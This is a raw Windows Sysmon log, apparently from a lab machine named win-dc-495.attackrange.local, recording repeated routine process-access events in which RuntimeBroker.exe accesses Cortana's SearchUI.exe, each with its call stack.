13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 